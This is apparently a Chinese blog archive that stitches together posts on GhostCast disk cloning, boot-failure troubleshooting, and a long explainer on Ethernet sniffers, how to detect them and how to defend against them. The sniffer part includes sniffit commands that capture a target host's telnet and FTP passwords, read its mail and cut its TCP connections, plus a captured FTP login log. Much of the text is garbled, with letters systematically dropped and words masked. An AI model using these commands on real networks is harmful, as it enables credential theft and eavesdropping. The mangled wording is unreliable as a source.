IP=192.168.0.108 //客户机IP，按实际修改
NETMASK=255.255.255.0 //子网掩码
GATEWAY=192.168.0.101 //GhostCast网络克隆服务端IP，按实际修改
2、重启计算机，启动时按F8，并选第6项进入纯DOS。
七、开始客户端的接入：
运行netghost.bat，出现GHOST程序界面，选菜单上GhostCast - Multicast项，
按了OK了，如接入成功，就马上可以看到象单机克隆那样的界面了，这文章是在家里的单机上写的，没法抓图给大家看了，反正如果是进行全盘克隆，接入成功后，选OK，OK，YES。这样客户端就进入等待接收状态了。
所有的客户端都接入成功并进入接收状态后，如果服务端那里设了自动开始模式条件，条件符合后就自动发送了，如果没有设置自动开始条件，我们就走回服务端机器那里，点击“发送”按钮，就开始网络克隆了。
我们就可以坐下来，喝喝茶，抽抽烟，等待网络克隆完成了。
1VS30的时候
40G硬盘做成的整盘镜像文件大概有9G左右(软件和游戏全部***好,大概是16G左右),然后,克隆服务器配置:CII733,128M,10/100M,下面的速度大概可以达到150/M左右,就是说同时克隆好30台电脑,大概需要1小时零40分钟,约等于100分钟,没台平均3分钟,还不用拿螺丝刀拆机箱,搬电脑,一个字爽!
2006-08-17 11:10
(分类:
DISK BOOT FAILURE PLEASE INSERT SYSTEM DISK AND PRESS ENTER
解决方法
首先确定你的系统已经分区了， 还有已经***了系统.
如果新硬盘没有分区或者分去后没有***操作系统,那么开机就会显示DISK BOOT FAILURE PLEASE INSERT SYSTEM DISK AND PRESS ENTER
还有的系统是***了， 但是因为 误操作将系统文件删掉,或者被病毒破坏等 引起操作系统损坏,导致 电脑启动后硬盘识别不到系统,也会出现DISK BOOT FAILURE PLEASE INSERT SYSTEM DISK AND PRESS ENTER
如果排除了上面两个 问题
请 到BIOS里 调节第一启动为 硬盘启动看看
3.建议把硬盘数据线电源拔下重插,有条件的话,可以更换新的数据线,或者将光驱数据线拿来带用一下
4.如果数据线和电源线都换过,还是一样的问题,建议换个IDE插槽,把光驱的IDE2 插槽上的数据线拔下,直接插到硬盘上测试,如果此时能够识别,说明是数据线接触不稳或者是IDE插槽问题
5.如果是双硬盘或者硬盘和光驱同时接在一条数据线上,请检查跳线设置是否正确
6.经过已上五步排除法测试,如果硬盘没有本身问题,那应该是解决了,如果还是没有解决,请将硬盘取下,接到其他电脑上测试,如果其他电脑上也识别不到该硬盘,说明硬盘本身出了故障了， 包括坏道等 简单介绍:
1.进入AWARD BIOS设置
STANDARD CMOS SETUP（标准CMOS设定）---BOOT SEQUENCE（开机优先顺序）---cd
2.AMI Bios 设置
Boot（启动设备设置）---Boot Device Priority（启动装置顺序）---1st boot device---cd
3.Award Bios 设置
Advanced BIOS Features（BIOS进阶功能设定）---Hard Disk Boot Priority（硬盘引导顺序）:---First Boot Device --cd
2006-08-14 18:21
(分类:
什么是 iffer及其工作原理
与***电路不同，计算机网络是共享通讯通道的。支持每对通讯计算机独占通道的交换机/集线器仍然过于昂贵。共享意味着计算机能够接收到发送给其它计算机的信息。捕获在网络中传输的数据信息就称为 iffing（窃听）。
以太网是现在应用最广泛的计算机连网方式。以太网协议是在同一回路向所有主机发送数据包信息。数据包头包含有目标主机的正确地址。一般情况下只有具有该地址的主机会接受这个数据包。如果一台主机能够接收所有数据包，而不理会数据包头内容，这种方式通常称为“混杂”模式。
由于在一个普通的网络环境中，帐号和口令信息以明文方式在以太网中传输，一旦入侵者获得其中一台主机的root权限，并将其置于混杂模式以窃听网络数据，从而有可能入侵网络中的所有计算机。
哪里可以得到 iffer
Sniffer是黑客们最常用的入侵手段之一。例如E iff.c，是一个小巧的工具，运行在SunOS平台，可捕获所有telnet、ftp、rloing会话的前300个字节内容。这个由Phrack开发的程序已成为在黑客中传播最广泛的工具之一。
你可以在经过允许的网络中运行E iff.c，了解它是如何有效地危及本地机器安全。
以下是一些也被广泛用于调试网络故障的 iffer工具：
*EtherfindonSunOs
*SnooponSolaris2.xandSunOs
*Tcpdump
*Packetman,Interman,Etherman,Loadman
商用 iffer：
*NetworkGeneral.
NetworkGeneral开发了多种产品。最重要的是ExpertSniffer，它不仅仅可以 iff，还能够通过高性能的专门系统发送/接收数据包，帮助诊断故障。还有一个增强产品"DistrbutedSnifferSystem"可以将UNIX工作站作为 iffer控制台，而将 ifferagents（代理）分布到远程主机上。
*Microsoft NetMonitor
对于某些商业站点，可能同时需要运行多种协议——NetBEUI、IPX/SPX、TCP/IP、802.3和SNA等。这时很难找到一种 iffer帮助解决网络问题，因为许多 iffer往往将某些正确的协议数据包当成了错误数据包。Microsoft的NetMonitor（以前叫Bloodhound）可以解决这个难题。它能够正确区分诸如Netware控制数据包、NTNetBios名字服务广播等独特的数据包。（etherfind只会将这些数据包标识为类型0000的广播数据包。）这个工具运行在MSWindows平台上。它甚至能够按MAC地址（或主机名）进行网络统计和会话信息监视。只需简单地单击某个会话即可获得tcpdump标准的输出。过滤器设置也是最为简单的，只要在一个对话框中单击需要监视的主机即可。
-------------------------------------------------------------------------------
如何监测主机正在窃听（ iffed）
要监测只采集数据而不对任何信息进行响应的窃听设备，需要逐个仔细检查以太网上所有物理连接。
不可能通过远程发送数据包或ping就可以检查计算机是否正在窃听。
一个主机上的 iffer会将网络接口置为混杂模式以接收所有数据包。对于某些UNIX系统，通过监测到混杂模式的网络接口。虽然可以在非混杂模式下运行 iffer，但这样将只能捕获本机会话。入侵者也可能通过在诸如sh、telnet、rlogin、in.telnetd等程序中捕获会话，并将用户操作记录到其它文件中。这些都可能通过监视tty和kmem等设备轻易发现。只有混杂模式下的 iffing才能捕获以太网中的所有会话，其它模式只能捕获本机会话。
对于SunOS、NetBSD和其它BSDUnix系统，如下命令：
"ifconfig-a"
会显示所有网络接口信息和是否在混杂模式。DECOSF/1和IRIX等系统需要指定设备。要找到系统中有什么网络接口，可以运行如下命令：
#netstat-r
Routingtables
Internet:
DestinationGatewayFlagsRefsUseInterface
defaulti .netUG124949le0
localhostlocalhostUH283lo0
然后通过如下命令检查每个网络接口：
#ifconfigle0
le0:flags=8863
inet127.0.0.1netmask0xffffff00broadcast255.0.0.1
入侵者经常会替换ifconfig等命令来避开检查，因此一定要检查命令程序的校验值。
在ftp.cert.org:/pub/tools/的cpm程序（SunOS平台）可以检查接口是否有混杂模式标记。
对于Ultrix系统，使用pfstat和pfconfig命令也可能监测是否有 iffer运行。
pfconfig指定谁有权限运行 iffer。
pfstat显示网络接口是否处于混杂模式。
这些命令只在 iffer与内核存在链接时有效。而在缺省情况， iffer是没有与内核链接的。大多数的Unix系统，例如Irix、Solaris、SCO等，都没有任何标记来指示是否处于混杂模式，因此入侵者能够窃听整个网络而却无法监测到它。
通常一个 iffer的记录文件会很快增大并填满文件空间。在一个大型网络中， iffer明显加重机器负荷。这些警告信息往往能够帮助管理员发现 iffer。建议使用lsof程序搜索访问数据包设备（如SunOS的/dev/nit）的程序和记录文件。
阻止 iffer
主动式集线器只向目标地址主机发送数据包，从而使混杂模式 iffer失效。它仅适用于10Base-T以太网。（注：这种现在已在计算机市场消失。）
只有两家厂商曾生产过主动式集线器：
随着交换机的成本和价格的大幅度降低，交换机已成为非常有效的使 iffer失效的设备。目前最常见的交换机在第三层（网络层）根据数据包目标地址进行转发，而不太采取集线器的广播方式，从而使 iffer失去了用武之地。
目前有许多软件包可用于加密连接，从而使入侵者即使捕获到数据，但无法将数据解密而失去窃听的意义。
以下是以前常用的一些软件包
*deslogin
coast.cs.purdue.edu:/pub/tools/unix/deslogin.
ftp.csua.berkeley.edu:/pub/cypherpunks/swIPe/
*Netlock
Kerberos
Kerberos是另一个加密网络中帐号信息的软件包。它的缺点是所有帐号信息都存放在一台主机中，如果该主机被入侵，则会危及整个网络安全。另外配置它也不是一件简单的事情。Kerberos包括流加密rlogind和流加密telnetd等，它可以防止入侵者捕获用户在登录完成后所进行的操作。
KerberosFAQ可从ftp站点rtfm.mit.edu中得到：
/pub/usenet/comp.protocols/kerberos/Kerberos_Users__Frequently_Asked_Questio _1.11
一次性口令技术
S/key和其它一次性口令技术一样，使窃听帐号信息失去意义。S/key的原理是远程主机已得到一个口令（这个口令不会在不安全的网络中传输），当用户连接时会获得一个“挑战”(challenge)信息，用户将这个信息和口令经过某个算法运算，产生正确的“响应”(re o e)信息（如果通讯双方口令正确的话）。这种验证方式无需在网络中传输口令，而且相同的“挑战/响应”也不会出现两次。S/key可从以下网址得到：ftp://thumper.bellcore.com/pub/nmh/skey
还有一种一次性口令技术是ID卡系统。每个授权用户都有一个产生用于访问各自帐号的数字号码的ID卡。如果没有这个ID卡，不可能猜出这个数字号码。
以下是提供这类解决方案的公司资料：
SecureNetKey(SNK)
DigitalPathways,Inc.
201RavendaleDr.Mountainview,Ca.
97703-5216USA
Phone:415-964-0707Fax:(415)961-7487
SecureID
SecurityDynamics,
OneAlewifeCenter
Cambridge,MA02140-2312
USAPhone:617-547-7820
Fax:(617)354-8836
SecureIDusestimeslotsasauthenicationratherthanchallenge/re o e.
ArKeyandOneTimePa ManagementAnalytics
POBox1480
Hudson,OH44236
Email:fc@all.net
Tel:US+216-686-0090Fax:US+216-686-0092
WatchWordandWatchWordII
Racal-Guardata
480SpringParkPlace
Herndon,VA22070
703-471-0892
1-800-521-6261ext217
CRYPTOCard
ArnoldCo ulting,Inc.
2530TargheeStreet,Madison,Wisco in
53711-5491U.S.A.
Phone:608-278-7700Fax:608-278-7701
Email:Stephen.L.Arnold@Arnold.Com
CRYPTOCardisamodern,SecureID-sized,SNK-compatibledevice.
SafeWord
EnigmaLogic,Inc.
2151Salvio#301
Concord,CA94520
510-827-5707Fax:(510)827-2593
ForinformationaboutEnigmaftpto:ftp.netcom.comindirectory
/pub/sa/safeword
SecureComputingCorporation:
2675LongLakeRoad
Roseville,MN55113
Tel:(612)628-2700
Fax:(612)628-2701
debernar@sctc.com
非混杂模式网络接口设备
以前，大多数IBMDOS兼容机器的网卡都不支持混杂模式，所以无法进行 iffing。但DOS已退出计算机网络舞台，对于现在计算机市场中的网络接口设备，请向供应商查询是否为非混杂模式设备（即不支持混杂模式）。
2006-08-14 18:19
(分类:
随着Internet及电子商务的日益普及,Internet的安全也越来越受到重视。在Internet安全隐患中扮演重要角色的是Sniffer和Sca er,本文将介绍Sniffer以及如何阻止 iffer。 　　大多数的黑客仅仅为了探测内部网上的主机并取得控制权，只有那些"雄心勃勃"的黑客，为了控制整个网络才会***特洛伊木马和后门程序，并清除记录。他们经常使用的手法是*** iffer。 　　在内部网上，黑客要想迅速获得大量的账号（包括用户名和密码），最为有效的手段是使用 " iffer" 程序。这种方法要求运行Sniffer 程序的主机和被***的主机必须在同一个以太网段上，故而在外部主机上运行 iffer是没有效果的。再者，必须以root的身份使用 iffer 程序，才能够***到以太网段上的数据流。 　　黑客会使用各种方法，获得系统的控制权并留下再次侵入的后门，以保证 iffer能够执行。在Solari 2.x平台上， iffer 程序通常被***在/usr/bi 或/dev目录下。黑客还会巧妙的修改时间，使得 iffer程序看上去是和其它系统程序同时***的。 　　大多数 "ethernet iffer"程序在后台运行，将结果输出到某个记录文件中。黑客常常会修改 程序，使得系统管理员很难发现运行的 iffer程序。 　　"ethernet iffer"程序将系统的网络接口设定为混合模式。这样，它就可以***到所有流经同一以太网网段的数据包，不管它的接受者或发送者是不是运行 iffer的主机。 程序将用户名、密码和其它黑客感兴趣的数据存入log文件。黑客会等待一段时间 ----- 比如一周后，再回到这里下载记录文件。 一、什么是 iffer 　　与***电路不同，计算机网络是共享通讯通道的。共享意味着计算机能够接收到发送给其它计算机的信息。捕获在网络中传输的数据信息就称为 iffing（窃听）。 　　以太网是现在应用最广泛的计算机连网方式。以太网协议是在同一回路向所有主机发送数据包信息。数据包头包含有目标主机的正确地址。一般情况下只有具有该地址的主机会接受这个数据包。如果一台主机能够接收所有数据包，而不理会数据包头内容，这种方式通常称为"混杂" 模式。 　　由于在一个普通的网络环境中，帐号和口令信息以明文方式在以太网中传输， 一旦入侵者获得其中一台主机的root权限，并将其置于混杂模式以窃听网络数据，从而有可能入侵网络中的所有计算机。 二、 iffer工作原理 　　通常在同一个网段的所有网络接口都有访问在物理媒体上传输的所有数据的能力，而每个网络接口都还应该有一个硬件地址，该硬件地址不同于网络中存在的其他网络接口的硬件地址，同时，每个网络至少还要一个广播地址。（代表所有的接口地址），在正常情况下，一个合法的网络接口应该只响应这样的两种数据帧： 　　1、帧的目标区域具有和本地网络接口相匹配的硬件地址。 　　2、帧的目标区域具有"广播地址"。 　　在接受到上面两种情况的数据包时，nc通过cpu产生一个硬件中断，该中断能引起操作系统注意，然后将帧中所包含的数据传送给系统进一步处理。 　　而 iffer就是一种能将本地nc状态设成（promiscuous）状态的软件，当nc处于这种"混杂"方式时，该nc具备"广播地址"，它对所有遭遇到的每一个帧都产生一个硬件中断以便提醒操作系统处理流经该物理媒体上的每一个报文包。（绝大多数的nc具备置成 romiscuous方式的能力） 　　可见， iffer工作在网络环境中的底层，它会拦截所有的正在网络上传送的数据，并且通过相应的软件处理，可以实时分析这些数据的内容，进而分析所处的网络状态和整体布局。值得注意的是： iffer是极其安静的，它是一种消极的安全攻击。 　　通常 iffer所要关心的内容可以分成这样几类： 　　1、口令 　　我想这是绝爱猫扑.爱生活使用 iffer的理由， iffer可以记录到明文传送的userid和pa wd.就算你在网络传送过程中使用了加密的数据， iffer记录的数据一样有可能使入侵者在家里边吃肉串边想办法算出你的算法。 　　2、金融帐号 　　许多用户很放心在网上使用自己的信用卡或现金帐号，然而 iffer可以很轻松截获在网上传送的用户姓名、口令、信用卡号码、截止日期、帐号和pin. 　　3、偷窥机密或敏感的信息数据 　　通过拦截数据包，入侵者可以很方便记录别人之间敏感的信息传送，或者干脆拦截整个的email会话过程。 　　4、窥探低级的协议信息。 　　这是很可怕的事，我认为，通过对底层的信息协议记录，比如记录两台主机之间的网络接口地址、远程网络接口ip地址、ip路由信息和tcp连接的字节顺序号码等。这些信息由非法入侵的人掌握后将对网络安全构成极大的危害，通常有人用 iffer收集这些信息只有一个原因：他正在进行一次欺诈，（通常的ip地址欺诈就要求你准确插入tcp连接的字节顺序号,这将在以后整理的文章中指出）如果某人很关心这个问题，那么 iffer对他来说只是前奏，今后的问题要大得多。（对于高级的hacker而言，我想这是使用 iffer的唯一理由吧） 三、 哪里可以得到 iffer 　　Sniffer是黑客们最常用的入侵手段之一。你可以在经过允许的网络中运行 iffer，了解它是如何有效地危及本地机器安全。 　　Sniffer可以是硬件，也可以是软件。现在品种最多,应用最广的是软件Sniffer,绝大多数黑客们用的也是软件Sniffer。 　　以下是一些也被广泛用于调试网络故障的 iffer工具： 　　 商用 iffer： 　　1. Network General. 　　Network General开发了多种产品。最重要的是Expert Sniffer，它不仅仅可以 iff，还能够通过高性能的专门系统发送/接收数据包，帮助诊断故障。还有一个增强产品"Distrbuted Sniffer System"可以将UNIX工作站作为 iffer控制台，而将 iffer agents（代理）分布到远程主机上。 　　2. Microsoft’ Net Monitor 　　对于某些商业站点，可能同时需要运行多种协议--NetBEUI、IPX/SPX、TCP/IP、802.3和SNA等。这时很难找到一种 iffer帮助解决网络问题，因为许多 iffer往往将某些正确的协议数据包当成了错误数据包。Microsoft的Net Monitor（以前叫Bloodhound）可以解决这个难题。它能够正确区分诸如Netware控制数据包、NT NetBios名字服务广播等独特的数据包。（etherfind只会将这些数据包标识为类型0000的广播数据包。）这个工具运行在MS Window 平台上。它甚至能够按MAC地址（或主机名）进行网络统计和会话信息监视。只需简单地单击某个会话即可获得tcpdump标准的输出。过滤器设置也是最为简单的，只要在一个对话框中单击需要监视的主机即可。 　　 免费软件 iffer 　　1. Sniffit由Lawrence Berkeley 实验室开发，运行于Solaris、SGI和Linux等平台。可以选择源、目标地址或地址集合，还可以选择***的端口、协议和网络接口等。这个SNIFFER默认状态下只接受最先的400个字节的信息包，这对于一次登陆会话进程刚刚好。 　　2. SNORT：这个SNIFFER有很多选项供你使用并可移植性强，可以记录一些连接信息，用来跟踪一些网络活动。 　　3. TCPDUMP：这个SNIFFER很有名，linux,FREEBSD还搭带在系统上，是一个被很多UNIX高手认为是一个专业的网络管理工具，记得以前TsutomuShimomura（应该叫下村侵吧）就是使用他自己修改过的TCPDUMP版本来记录了KEVINMITNICK攻击他系统的记录，后来就配合FBI抓住了KEVINMITNICK，后来他写了一文：使用这些LOG记录描述了那次的攻击，HowMitnickhackedTsutomuShimomurawithanIPsequenceattack (http://www.attrition.org/security/newbie/security/ iffer/shimomur.txt) 　　4. ADM iff:这是非常有名的ADM黑客集团写的一个SNIFFER程序。 　　5. li iffer:这是一个专门设计杂一LINUX平台上的SNIFFER。 　　6. E iffer:这个也是一个比较有名的SNIFFER程序。 　　7. Sol iffer:这是个Solari iffer，主要是修改了SunSniff专门用来可以方便的在Solair平台上编译。 　　8. Ethereal是一基于GTK＋的一个图形化Sniffer 　　9. Go ler(for MS－DOS＆Win95)、Netman、NitWit、Ethload...等等。 四、 iffer的***使用。 　　我主要以 iffit为例分别介绍在nt和linux下的应用。 　　[1] 在linux下的 iffit 　　 ***软件的***很简单: 　　1、用tar zvfx iffit.*.*.*.tgz将下载下来的 iffit.*.*.*.tgz解压缩到你想要的目的文件夹，如果版本是0.3.7的话,你会看到该目录下出现一个 iffit.0.3.7的目录。 　　 　　2、cd iffit.0.3.7 　　3、./configure am am make，只要在这个过程中终端上没有意外的error信息 出现，你就算编译成功了--可以得到一个二进制的 iffit文件。 　　4、make clean把不用的垃圾扫掉…… 　　、使用方法 　　1、参数 　　这个东东具有如下的命令选项： 　　-v显示版本信息 　　-t让程序去***指定流向某IP的数据包 　　-s让程序去***从某IP流出的IP数据包，可以使用@通配符，如-t199.145.@ 　　-i显示出窗口界面，能察看当前在你所属网络上进行连接的机器 　　-I扩展的交互模式，忽略所有其它选项，比-i强大得多…… 　　-c利用脚本来运行程序 　　-F强制使程序使用网络硬盘 　　-n显示出假的数据包。象使用ARP、RARP或者其他不是IP的数据包也会显示出来 　　-N只运行plugin时的选项，使其它选项失效 　　在-i模式下无法工作的参数： 　　-b同时做-t和-s的工作…… 　　-d将***所得内容显示在当前终端--以十六进制表示 　　-a将***所得内容显示在当前终端--以ASCII字符表示 　　-x打印TCP包的扩展信息(SEQ,ACK,Flags)，可以与’-a’,’-d’,’-s’,’-t’,’-b’一起运作，注意--　它是输出在标准输出的，如果只用-t,-s,- 而没有其它参数配合的话不会被写入文件。 　　-R将所有通信记录在文件中 　　-r这一选项将记录文件送往 iffit,它需要-F的参数配合指明设备，假设你用’eth0’(第一块网卡)来记录文件，你必须在命令行里面加上’-Feth0’或者’或者’或者’或者’或者’-Feth’-A遇到不认识的字符时用指定的字符代替-P定义***的协议，DEFAULT为TCP--也可以选IP、ICMP、UDP…… 　　-p定义***端口，默认为全部 　　-l设定数据包大小，default是300字节。 　　-M激活插件 　　-I，-i模式下的参数 　　-D所有的记录会被送到这个磁盘上。 　　-c模式下的参数 　　-L 　　其中logparam可以是如下的内容： 　　raw:轻度 　　norm:常规 　　telnet:记录口令（端口23） 　　ftp:记录口令（端口21） 　　mail:记录信件内容（端口25） 　　比如说"ftpmailnorm"就是一个合法的logparam 　　2、图形仿真界面 　　就是上面所说的-i选项啦，我们输入 iffit-i会出现一个窗口环境，从中可以看到自己所在的网络中有哪些机器正在连接，使用什么端口号，其中可用的命令如下： 　　q退出窗口环境，结束程序 　　r刷新屏幕，重新显示正在在连线的机器 　　n产生一个小窗口，包括TCP、IP、ICMP、UDP等协议的流量 　　g产生数据包，正常情况下只有UDP协议才会产生，执行此命令要回答一些 　　关于数据包的问题 　　F1改变来源网域的IP地址，默认为全部 　　F2改变目的网域的IP地址，默认为全部 　　F3改变来源机器的端口号，默认为全部 　　F4改变目的机器的端口号，默认为全部 　　、一些示例 　　假设有以下的设置：在一个子网中有两台主机，一台运行了 iffer，我们称之为 iffit.com，另一台是66.66.66.7，我们称之为target.com。 　　1你希望检查 iffer是否能运行 iffit:~/# iffit-d-p7-t66.66.66.7 并且开另一个窗口: 　　 iffit:~/$telnettarget.com7 　　你可以看到 iffer将你telnet到对方7号端口echo服务的包捕获了。 　　2你希望截获target.com上的用户密码 　　 iffit:~/# iffit-p23-t66.66.66.7 　　3target.com主机的根用户声称有奇怪的FTP连接并且希望找出他们的击键 　　 iffit:~/# iffit-p21-l0-t66.66.66.7 　　4你希望能阅读所有进出target.com的信件 　　 iffit:~/# iffit-p25-l0-b-t66.66.66.7&am 或者 iffit:~/# iffit-p25-l0-b-s66.66.66.7&am 　　5你希望使用用户交互界面 　　 iffit:~/# iffit-i 　　6有错误发生而且你希望截获控制信息 　　 iffit:~/# iffit-Picmp-b-s66.66.66.7 　　7Gowildo crollingthescreen. 　　 iffit:~/# iffit-Pip-Picmp-Ptcp-p0-b-a-d-x-s66.66.66.7 　　与之效果相当的是 iffit:~/# iffit-Pipicmptcp-p0-b-a-d-x-s66.66.66.7 　　8你可以用’more66*’读取下列方式记录下的密码 　　 iffit:~/# iffit-p23-A.-t66.66.66.7或者 iffit:~/# iffit-p23-A^-tdummy.net 　　、高级应用 　　1、用脚本执行 　　这是配合选项-c的，其执行方法也很简单，比如以如下方式编辑一个叫sh的文件 　　selectfromhost180.180.180.1 　　selecttohost180.180.180.10 　　selectbothport21 　　然后执行： iffit-csh 　　说明：***从180.180.180.1送往180.180.180.10的数据包，端口为FTP口。这里不做更多说明，你可以自己去看里面的README。 　　2、插件 　　要获取一个插件是很简单的，你将它放入 iffit的目录下，并且象如下方式编辑 _plugin.***件： 　　#define PLUGIN1_NAME "Myplugin" 　　#define PLUGIN1(x) main_plugin_function(x) 　　#include "my_plugin.plug" 　　注意: 　　a)你可以让plugin从0-9，所以从PLUGIN0_NAME到PLUGIN1_NAME……不必是连续的 　　d)#include"my_plugin.plug"这是我的插件源代码放置的地方。如果想详细了解的话，还是看看里面的plugin.howto吧。 　　3、介绍tod 　　这东东便是 iffit最有名的一个插件了，为什么叫TOD呢--touchofdeath,它可以轻易地切断一个TCP连接，原理是向一个TCP连接中的一台主机发送一个断开连接的IP包，这个IP包的RST位置1，便可以了。 　　将下载下来的tod.tar.gz拷贝到 iffit所在目录下，解压***后ln-stod iffit_key5就可以将这相程序与F5键连接起来，想切断哪台机器的话，只要在窗口中将光标指到需要断线的机器上按下F5键就可以了。你可以自由地定义成其它的F功能键--F1~F4不行，它们已经被定义过了…… 　　[2] 在NT下的 iffit 　　Sniffit 0.3.7推出了NT版本，也支持WINDOWS2000，这个 iffit需要WinPcap包，就是类似与li cap的包，支持WIN32平台上可以信息包捕获和网络分析,是基于UNIX的li cap和BPF（Berkeley 分帧过滤器）模型的包。它包括内核级的包过滤驱动程序，低级动态连接库(packet.dll),和高级系统无关性库(li cap,基于0.4a6版本）。 　　这个WinPcap信息包捕获启动程序可把设备驱动增加在Window 95, Window 98, Window NT 和 Window 2000 上，可以有能力捕获和发送通过原始套接口的信息包（raw ackets),Packet.dll是一个能用来直接访问BPF驱动程序的API。 　　WinPcap在http://netgroup-serv.polito.it/windump和http://netgroup-serv.polito.it/analyzer这两个工具中成功应用。最新的WinPcap是版本2.02，修补了2.01版本中的一些缺陷，并且支持WIN2000。具体信息和源代码可以在下面这个站点找到： 　　http://netgroup-serv.polito.it/wi cap/ 　　下面是在WIN2K中***的步骤： 　　1）先下载packet.exe这个程序后展开***。 　　2）打开WINDOWS2000的控制面板 　　3）从控制面板中双击"网络和拨号连接"图标，在打开"本地连接"图标，并选择属性选项。 　　4）在显示的对话框中选择"***",***网络组件。 　　5）再在出现的对话框中选择"协议"，点击"增加"。 　　6）在出现的对话框中选择"从磁盘***"，选择正确路径，就是刚才你解压的网络设备驱动程序（这个文件夹中必须包含packet.inf和packet.sys)的地方，在选择确定。 　　7）在选择"Packet capture Driver v X.XX ",并按照指示来完成***，往往要你WINDOWS2000的***光盘。 　　8）查看网络组件中有没有 Packet capture Driver v X.XX 这一行，有的话说明这个驱动程序已经建立并绑定了网络接口。 　　再重新启动机器。然后解压 iffit_nt.0.3.7.beta，再使用命令行模式，我简单的使用了一个命令行，刚开始是使用 iffit -t 192.168.0.1 - 21，想监视下21 FTP端口的密码捕获成不成功，但出现"Automatic etwork device looku ot yet u orted i Win32 version... use ’-F /Device/Packet_{31BB7ED2-125E-11D4-8F11-D79985727802}’ to force the choice，Read the README.FIRST o how to force etwork devices.的提示，于是我按照其提示所示，使用了 iffit -F /Device/packet_{31BB7ED2-125E-11D4-8F11-D79985727 802} -t 192.168.0.1 - 21命令，这时出现下面的提示： 　　Forcing device to /Device/packet_{31BB7ED2-125E-11D4-8F1 quested)... 　　Make ure you have read the doc carefully. 　　Sniffit.0.3.7 Beta i u and ru ing.... (192.168.0.1) 　　这就表明 iffit在工作了，于是在FTP到NT的端口，输入密码，随即就可以在刚才SNIFFIT的目录下看到一个关于192.168.0.2.1281-192.168.0.1.21的文件，打开后查看里面的内容如下所示： 　　USER xundi 　　PASS xxxxxxx--------我隐藏了，XIXI 　　SYST 　　PORT 192,168,0,2,5,2 　　LIST 　　PORT 192,168,0,2,5,3 　　LIST 　　CWD g: 　　CWD c 　　PORT 192,168,0,2,5,26 　　LIST 　　CWD hack 　　PORT 192,168,0,2,5,88 　　LIST 　　看，是不是很整洁啊，至于文件名为何是这样192.168.0.2.1281-192.168.0.1.21，那是应该是一个客户/服务器模式，客户端的连接是随意开一个1281端口地址和192.168.0.1的21口连接。 五、如何监测主机正在窃听（ iffed） 　　如何才知道有没有 iffer在我的网上跑呢？这也是一个很难说明的问题，比较有说服力的理由证明你的网络有 iffer目前有这么几条： 　　1、你的网络通讯掉包率反常的高。 　　通过一些网络软件，你可以看到你的信息包传送情况（不是 iffer），向ping这样的命令会告诉你掉了百分几的包。如果网络中有人在听，那么你的信息包传送将无法每次都顺畅的流到你的目的地。（这是由于 iffer拦 截每个包导致的） 　　2、你的网络带宽将出现反常。 　　通过某些带宽控制器（通常是火墙所带），你可以实时看到目前网络带宽的分布情况，如果某台机器长时间的占用了较大的带宽，这台机器就有可能在听。在非高速信道上，如56Kddn等，如果网络中存在 iffer,你应该也可以察觉出网络通讯速度的变化。 　　3、通常一个 iffer的记录文件会很快增大并填满文件空间。在一个大型网络中， iffer明显加重机器负荷。这些警告信息往往能够帮助管理员发现 iffer。 　　4、一个主机上的 iffer会将网络接口置为混杂模式以接收所有数据包。对于某些UNIX系统， 通过监测到混杂模式的网络接口。虽然可以在非混杂模式下运行 iffer，但这样将只能捕获本 机会话。只有混杂模式下的 iffing才能捕获以太网中的所有会话，其它模式只能捕获本机会话。 　　对于SunOS、linux和其它BSD Unix系统，如下命令： 　　"ifconfig -a" 　　会显示所有网络接口信息和是否在混杂模式。DEC OSF/1和IRIX等系统需要指定设备。要找到系统中有什么网络接口，可以运行如下命令： 　　# etstat -r 　　Routing table 　　Internet: 　　Destinatio Gateway Flag Ref Use Interface 　　default i .net UG 1 24949 le0 　　localhost localhost UH 2 83 lo0 　　然后通过如下命令检查每个网络接口： 　 　　#ifconfig le0 　　le0: flags=8863 　　inet 127.0.0.1 etmask 0xffffff00 roadcast 255.0.0.1 　　入侵者经常会替换ifconfig等命令来避开检查，因此一定要检查命令程序的校验值。 　　在ftp.cert.org:/pub/tools/的cpm程序（SunOS平台）可以检查接口是否有混杂模式标记。 　　这些命令只在 iffer与内核存在链接时有效。而在缺省情况， iffer是没有与内核链接的。大多数的Unix系统，例如Irix、Solaris、SCO等，都没有任何标记来指示是否处于混杂模式，因此入侵者能够窃听整个网络而却无法监测到它。 　　如果机器上使用两块网卡，把一块设置为杂乱模式，并把IP地址设置为0.0.0.0，另一块卡处于正常的模式并是正确的地址，这样将很难发现SNIFFER的存在。 　　注意：要监测只采集数据而不对任何信息进行响应的窃听设备，需要逐个仔细检查以太网上所有物理连接,不可能仅通过远程发送数据包或ping就可以检查计算机是否正在窃听. 六、如何阻止 iffer 　　1交换 　　随着交换机的成本和价格的大幅度降低，交换机已成为非常有效的使 iffer失效的设备。目前最常见的交换机在第三层（网络层）根据数据包目标地址进行转发，而不太采取集线器的广播方式，从理论上讲，通过交换设备对网络进行分段后， iffer将无法透过边界而窥探另一边的数据包。但是，请注意：这是在边界设备不转发广播包的情况下（这也是通常的网络情况）。一旦入侵者使用 oofer诱骗某个边界设备而将自己的广播包流入不该进入的网段后，原理上还是在一个共享设备端使用 iffer,而实际上将是听到了边界的另一边).当然，这样会牵涉到ip欺诈和Mac欺诈的问题，然而,你别忘了， iffer和 oofer是很少分开来的。 　　2加密 　　目前有许多软件包可用于加密连接，从而使入侵者即使捕获到数据，但无法将数据解密而失去窃听的意义。 　　3入侵检测 　　使用诸如Tripwire之类的工具，生成文件系统的MD5"数据指纹"，及时发现被修改的系统文件； 　　4)使用anti iffer软件 　　一些流行的检测SNIFFER的程序： 　　http://www.attrition.org/security/newbie/security/ iffer/promisc.c --是一个很小的C程序，当编译好后，会查找本地机器上任何处于杂乱模式的NIC网络适配卡。 　　http://www.attrition.org/security/newbie/security/ iffer/neped.c --是一个用来远程检查任何嗅探活动的程序，可惜它只在LINUX下编译，当然你也可以简单的使用’ifconfig-a’来检查你的UNIX机器是否有PROMISC标志。 　　http://www.l0pht.com/anti iff/这是L0pht写的很好的反SNIFFER程序，L0PHT还打算公开LINUX版本上的源码版本。 　　下面我介绍一下sentinel的用法 　　Sentinel主要是设计思想是portable,arrcurate implementation,就是说小巧点，精确实现几个熟知的杂乱方式探测技术。其中Sentinel支持三种方法的远程杂乱探测模式：DNS测试，Etherping测试，和ARP测试，其中还有一种ICMP ing Latency(ICMP PING反应时间）正在开发中。 　　此程序需要Li et和li cap库来支持，大家可以到下面的地址去下载： 　　LI et 1.0: http://www.packetfactory.net/Projects/li et 　　li ca 0.4: ftp://ftp.ee.lbl.gov/li cap-0.4.tar.Z 　　首先说下它其中使用的三种模式： 　　--ARP测试模式： 　　